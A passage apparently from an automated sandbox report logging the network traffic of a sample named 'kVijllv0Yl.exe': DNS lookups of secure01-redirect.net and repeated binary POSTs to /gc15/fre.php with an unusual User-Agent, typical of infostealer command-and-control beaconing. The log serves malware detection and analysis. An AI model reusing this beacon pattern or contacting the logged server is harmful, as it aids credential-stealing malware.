              Jan 28, 2022 23:37:07.375139952 CET8049769185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:08.647847891 CET8049769185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:08.649538040 CET4976980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:08.649596930 CET4976980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:08.705777884 CET8049769185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:10.211724043 CET4977080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:10.268347979 CET8049770185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:10.268496990 CET4977080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:10.277966022 CET4977080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:10.334707022 CET8049770185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:10.334817886 CET4977080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:10.391747952 CET8049770185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:12.345729113 CET8049770185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:12.345850945 CET4977080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:12.345911026 CET4977080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:12.402575970 CET8049770185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:14.627826929 CET4977180192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:14.706403017 CET8049771185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:14.706513882 CET4977180192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:14.709347010 CET4977180192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:14.779093027 CET8049771185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:14.779185057 CET4977180192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:14.849184036 CET8049771185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:16.117796898 CET8049771185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:16.117954969 CET4977180192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:16.118154049 CET4977180192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:16.187680006 CET8049771185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:17.399497032 CET4977380192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:17.455802917 CET8049773185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:17.456547022 CET4977380192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:17.458668947 CET4977380192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:17.514766932 CET8049773185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:17.514823914 CET4977380192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:17.572290897 CET8049773185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:18.890583992 CET8049773185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:18.894428968 CET4977380192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:18.894535065 CET4977380192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:18.950567961 CET8049773185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:20.200753927 CET4977480192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:20.259144068 CET8049774185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:20.259227991 CET4977480192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:20.261991978 CET4977480192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:20.318341017 CET8049774185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:20.318430901 CET4977480192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:20.375220060 CET8049774185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:21.668706894 CET8049774185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:21.668883085 CET4977480192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:21.668941975 CET4977480192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:21.725199938 CET8049774185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:22.748919010 CET4977580192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:22.806096077 CET8049775185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:22.806251049 CET4977580192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:22.809911013 CET4977580192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:22.904851913 CET8049775185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:22.905011892 CET4977580192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:22.961323977 CET8049775185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:24.212196112 CET8049775185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:24.212405920 CET4977580192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:24.212441921 CET4977580192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:24.268726110 CET8049775185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:25.334419966 CET4977680192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:25.390957117 CET8049776185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:25.391129017 CET4977680192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:25.398463011 CET4977680192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:25.455079079 CET8049776185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:25.455180883 CET4977680192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:25.511708021 CET8049776185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:26.758080006 CET8049776185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:26.758199930 CET4977680192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:26.758239031 CET4977680192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:26.814860106 CET8049776185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:29.194413900 CET4977980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:29.260422945 CET8049779185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:29.260504961 CET4977980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:29.263305902 CET4977980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:29.329282999 CET8049779185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:29.329364061 CET4977980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:29.395251036 CET8049779185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:30.738581896 CET8049779185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:30.738667965 CET4977980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:30.738718033 CET4977980192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:30.804800987 CET8049779185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:33.891877890 CET4978080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:33.958883047 CET8049780185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:33.959032059 CET4978080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:33.962521076 CET4978080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:34.028996944 CET8049780185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:34.029126883 CET4978080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:34.095474958 CET8049780185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:35.373624086 CET8049780185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:35.373718977 CET4978080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:35.373763084 CET4978080192.168.2.6185.185.69.76
              Jan 28, 2022 23:37:35.440495968 CET8049780185.185.69.76192.168.2.6
              Jan 28, 2022 23:37:36.518332958 CET4978280192.168.2.6185.185.69.76

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 28, 2022 23:37:06.902832985 CET6026153192.168.2.68.8.8.8
              Jan 28, 2022 23:37:07.189394951 CET53602618.8.8.8192.168.2.6
              Jan 28, 2022 23:37:09.895837069 CET5606153192.168.2.68.8.8.8
              Jan 28, 2022 23:37:10.210237026 CET53560618.8.8.8192.168.2.6
              Jan 28, 2022 23:37:14.289541960 CET5833653192.168.2.68.8.8.8
              Jan 28, 2022 23:37:14.308670044 CET53583368.8.8.8192.168.2.6
              Jan 28, 2022 23:37:17.111224890 CET5406453192.168.2.68.8.8.8
              Jan 28, 2022 23:37:17.397923946 CET53540648.8.8.8192.168.2.6
              Jan 28, 2022 23:37:19.890825033 CET5281153192.168.2.68.8.8.8
              Jan 28, 2022 23:37:20.199086905 CET53528118.8.8.8192.168.2.6
              Jan 28, 2022 23:37:22.728606939 CET5529953192.168.2.68.8.8.8
              Jan 28, 2022 23:37:22.747112989 CET53552998.8.8.8192.168.2.6
              Jan 28, 2022 23:37:25.315891027 CET6374553192.168.2.68.8.8.8
              Jan 28, 2022 23:37:25.332844019 CET53637458.8.8.8192.168.2.6
              Jan 28, 2022 23:37:29.174689054 CET6137453192.168.2.68.8.8.8
              Jan 28, 2022 23:37:29.193221092 CET53613748.8.8.8192.168.2.6
              Jan 28, 2022 23:37:33.873795986 CET5033953192.168.2.68.8.8.8
              Jan 28, 2022 23:37:33.890588045 CET53503398.8.8.8192.168.2.6
              Jan 28, 2022 23:37:36.492325068 CET4969453192.168.2.68.8.8.8
              Jan 28, 2022 23:37:36.512134075 CET53496948.8.8.8192.168.2.6
              Jan 28, 2022 23:37:39.327147961 CET5498253192.168.2.68.8.8.8
              Jan 28, 2022 23:37:39.343832970 CET53549828.8.8.8192.168.2.6
              Jan 28, 2022 23:37:41.614988089 CET5001053192.168.2.68.8.8.8
              Jan 28, 2022 23:37:41.901705027 CET53500108.8.8.8192.168.2.6
              Jan 28, 2022 23:37:44.693382025 CET6381653192.168.2.68.8.8.8
              Jan 28, 2022 23:37:44.712313890 CET53638168.8.8.8192.168.2.6
              Jan 28, 2022 23:37:50.316968918 CET5757453192.168.2.68.8.8.8
              Jan 28, 2022 23:37:50.335726976 CET53575748.8.8.8192.168.2.6
              Jan 28, 2022 23:37:54.998337984 CET5662853192.168.2.68.8.8.8
              Jan 28, 2022 23:37:55.016972065 CET53566288.8.8.8192.168.2.6
              Jan 28, 2022 23:37:59.082956076 CET5379953192.168.2.68.8.8.8
              Jan 28, 2022 23:37:59.388312101 CET53537998.8.8.8192.168.2.6
              Jan 28, 2022 23:38:02.078545094 CET6402153192.168.2.68.8.8.8
              Jan 28, 2022 23:38:02.097598076 CET53640218.8.8.8192.168.2.6
              Jan 28, 2022 23:38:06.313935041 CET5632753192.168.2.68.8.8.8
              Jan 28, 2022 23:38:06.332571983 CET53563278.8.8.8192.168.2.6
              Jan 28, 2022 23:38:09.962450027 CET6205553192.168.2.68.8.8.8
              Jan 28, 2022 23:38:09.979409933 CET53620558.8.8.8192.168.2.6
              Jan 28, 2022 23:38:12.312206030 CET6124953192.168.2.68.8.8.8
              Jan 28, 2022 23:38:12.639857054 CET53612498.8.8.8192.168.2.6
              Jan 28, 2022 23:38:16.923599005 CET6525253192.168.2.68.8.8.8
              Jan 28, 2022 23:38:17.208503962 CET53652528.8.8.8192.168.2.6
              Jan 28, 2022 23:38:20.080570936 CET6436753192.168.2.68.8.8.8
              Jan 28, 2022 23:38:20.099165916 CET53643678.8.8.8192.168.2.6
              Jan 28, 2022 23:38:23.150827885 CET6021153192.168.2.68.8.8.8
              Jan 28, 2022 23:38:23.169887066 CET53602118.8.8.8192.168.2.6
              Jan 28, 2022 23:38:27.394073009 CET5518053192.168.2.68.8.8.8
              Jan 28, 2022 23:38:27.411124945 CET53551808.8.8.8192.168.2.6
              Jan 28, 2022 23:38:30.973910093 CET5872153192.168.2.68.8.8.8
              Jan 28, 2022 23:38:30.992604017 CET53587218.8.8.8192.168.2.6
              Jan 28, 2022 23:38:33.417038918 CET5769153192.168.2.68.8.8.8
              Jan 28, 2022 23:38:33.435640097 CET53576918.8.8.8192.168.2.6
              Jan 28, 2022 23:38:37.043313980 CET5948953192.168.2.68.8.8.8
              Jan 28, 2022 23:38:37.061940908 CET53594898.8.8.8192.168.2.6
              Jan 28, 2022 23:38:40.043288946 CET6402253192.168.2.68.8.8.8
              Jan 28, 2022 23:38:40.062098980 CET53640228.8.8.8192.168.2.6
              Jan 28, 2022 23:38:42.351895094 CET5719353192.168.2.68.8.8.8
              Jan 28, 2022 23:38:42.370554924 CET53571938.8.8.8192.168.2.6
              Jan 28, 2022 23:38:45.427057981 CET5024853192.168.2.68.8.8.8
              Jan 28, 2022 23:38:45.444062948 CET53502488.8.8.8192.168.2.6
              Jan 28, 2022 23:38:49.258750916 CET6042953192.168.2.68.8.8.8
              Jan 28, 2022 23:38:49.277318954 CET53604298.8.8.8192.168.2.6
              Jan 28, 2022 23:38:52.224076986 CET6034553192.168.2.68.8.8.8
              Jan 28, 2022 23:38:52.241295099 CET53603458.8.8.8192.168.2.6
              Jan 28, 2022 23:38:54.707078934 CET5873053192.168.2.68.8.8.8
              Jan 28, 2022 23:38:54.726234913 CET53587308.8.8.8192.168.2.6
              Jan 28, 2022 23:38:57.165729046 CET5722653192.168.2.68.8.8.8
              Jan 28, 2022 23:38:57.182893038 CET53572268.8.8.8192.168.2.6
              Jan 28, 2022 23:38:59.576981068 CET5788053192.168.2.68.8.8.8
              Jan 28, 2022 23:38:59.887764931 CET53578808.8.8.8192.168.2.6

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Jan 28, 2022 23:37:06.902832985 CET192.168.2.68.8.8.80x1758Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:09.895837069 CET192.168.2.68.8.8.80x8e74Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:14.289541960 CET192.168.2.68.8.8.80xce34Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:17.111224890 CET192.168.2.68.8.8.80xc12fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:19.890825033 CET192.168.2.68.8.8.80x6ed9Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:22.728606939 CET192.168.2.68.8.8.80x7b58Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:25.315891027 CET192.168.2.68.8.8.80xb9e4Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:29.174689054 CET192.168.2.68.8.8.80xb594Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:33.873795986 CET192.168.2.68.8.8.80x13c8Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:36.492325068 CET192.168.2.68.8.8.80x439fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:39.327147961 CET192.168.2.68.8.8.80x8600Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:41.614988089 CET192.168.2.68.8.8.80x5beeStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:44.693382025 CET192.168.2.68.8.8.80xf87fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:50.316968918 CET192.168.2.68.8.8.80x112bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:54.998337984 CET192.168.2.68.8.8.80xf5d8Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:37:59.082956076 CET192.168.2.68.8.8.80x4e06Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:02.078545094 CET192.168.2.68.8.8.80x7c80Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:06.313935041 CET192.168.2.68.8.8.80x35e8Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:09.962450027 CET192.168.2.68.8.8.80x557bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:12.312206030 CET192.168.2.68.8.8.80xb6caStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:16.923599005 CET192.168.2.68.8.8.80x4b7bStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:20.080570936 CET192.168.2.68.8.8.80x749fStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:23.150827885 CET192.168.2.68.8.8.80x5a17Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:27.394073009 CET192.168.2.68.8.8.80x6f6cStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:30.973910093 CET192.168.2.68.8.8.80x3c33Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:33.417038918 CET192.168.2.68.8.8.80xd1b4Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:37.043313980 CET192.168.2.68.8.8.80xd0d3Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:40.043288946 CET192.168.2.68.8.8.80x1c64Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:42.351895094 CET192.168.2.68.8.8.80x4aa3Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:45.427057981 CET192.168.2.68.8.8.80x6552Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:49.258750916 CET192.168.2.68.8.8.80xae82Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:52.224076986 CET192.168.2.68.8.8.80xdd80Standard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:54.707078934 CET192.168.2.68.8.8.80xfd3dStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:57.165729046 CET192.168.2.68.8.8.80xab3cStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)
              Jan 28, 2022 23:38:59.576981068 CET192.168.2.68.8.8.80x719aStandard query (0)secure01-redirect.netA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Jan 28, 2022 23:37:07.189394951 CET8.8.8.8192.168.2.60x1758No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:10.210237026 CET8.8.8.8192.168.2.60x8e74No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:14.308670044 CET8.8.8.8192.168.2.60xce34No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:17.397923946 CET8.8.8.8192.168.2.60xc12fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:20.199086905 CET8.8.8.8192.168.2.60x6ed9No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:22.747112989 CET8.8.8.8192.168.2.60x7b58No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:25.332844019 CET8.8.8.8192.168.2.60xb9e4No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:29.193221092 CET8.8.8.8192.168.2.60xb594No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:33.890588045 CET8.8.8.8192.168.2.60x13c8No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:36.512134075 CET8.8.8.8192.168.2.60x439fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:39.343832970 CET8.8.8.8192.168.2.60x8600No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:41.901705027 CET8.8.8.8192.168.2.60x5beeNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:44.712313890 CET8.8.8.8192.168.2.60xf87fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:50.335726976 CET8.8.8.8192.168.2.60x112bNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:55.016972065 CET8.8.8.8192.168.2.60xf5d8No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:37:59.388312101 CET8.8.8.8192.168.2.60x4e06No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:02.097598076 CET8.8.8.8192.168.2.60x7c80No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:06.332571983 CET8.8.8.8192.168.2.60x35e8No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:09.979409933 CET8.8.8.8192.168.2.60x557bNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:12.639857054 CET8.8.8.8192.168.2.60xb6caNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:17.208503962 CET8.8.8.8192.168.2.60x4b7bNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:20.099165916 CET8.8.8.8192.168.2.60x749fNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:23.169887066 CET8.8.8.8192.168.2.60x5a17No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:27.411124945 CET8.8.8.8192.168.2.60x6f6cNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:30.992604017 CET8.8.8.8192.168.2.60x3c33No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:33.435640097 CET8.8.8.8192.168.2.60xd1b4No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:37.061940908 CET8.8.8.8192.168.2.60xd0d3No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:40.062098980 CET8.8.8.8192.168.2.60x1c64No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:42.370554924 CET8.8.8.8192.168.2.60x4aa3No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:45.444062948 CET8.8.8.8192.168.2.60x6552No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:49.277318954 CET8.8.8.8192.168.2.60xae82No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:52.241295099 CET8.8.8.8192.168.2.60xdd80No error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:54.726234913 CET8.8.8.8192.168.2.60xfd3dNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:57.182893038 CET8.8.8.8192.168.2.60xab3cNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)
              Jan 28, 2022 23:38:59.887764931 CET8.8.8.8192.168.2.60x719aNo error (0)secure01-redirect.net185.185.69.76A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • secure01-redirect.net

              HTTP Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.649769185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:07.260369062 CET1240OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 196
              Connection: close
              Jan 28, 2022 23:37:08.647847891 CET1240INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:49 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 15
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              1192.168.2.649770185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:10.277966022 CET1241OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 196
              Connection: close
              Jan 28, 2022 23:37:12.345729113 CET1242INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:38:52 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 15
              Content-Type: text/html; charset=UTF-8
              Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              10192.168.2.649783185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:39.408766985 CET1383OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:40.689152956 CET1384INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:21 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              11192.168.2.649784185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:41.973819971 CET1384OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:43.403239012 CET1385INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:23 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              12192.168.2.649787185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:44.786353111 CET1397OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:46.235904932 CET1468INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:26 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              13192.168.2.649793185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:51.111628056 CET1514OUTPOST /gc15/fre.php HTTP/1.0
              User-Agent: Mozilla/4.08 (Charon; Inferno)
              Host: secure01-redirect.net
              Accept: */*
              Content-Type: application/octet-stream
              Content-Encoding: binary
              Content-Key: 7A2E941E
              Content-Length: 169
              Connection: close
              Jan 28, 2022 23:37:52.495630026 CET1514INHTTP/1.0 404 Not Found
              Date: Fri, 28 Jan 2022 22:39:32 GMT
              Server: Apache/2.4.6 (CentOS) PHP/5.4.16
              X-Powered-By: PHP/5.4.16
              Status: 404 Not Found
              Content-Length: 23
              Content-Type: text/html; charset=UTF-8
              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
              Data Ascii: File not found.


              Session IDSource IPSource PortDestination IPDestination PortProcess
              14192.168.2.649795185.185.69.7680C:\Users\user\Desktop\kVijllv0Yl.exe
              TimestampkBytes transferredDirectionData
              Jan 28, 2022 23:37:55.089534044 CET1516OUTPOST /gc15/fre.php HTTP/1.0
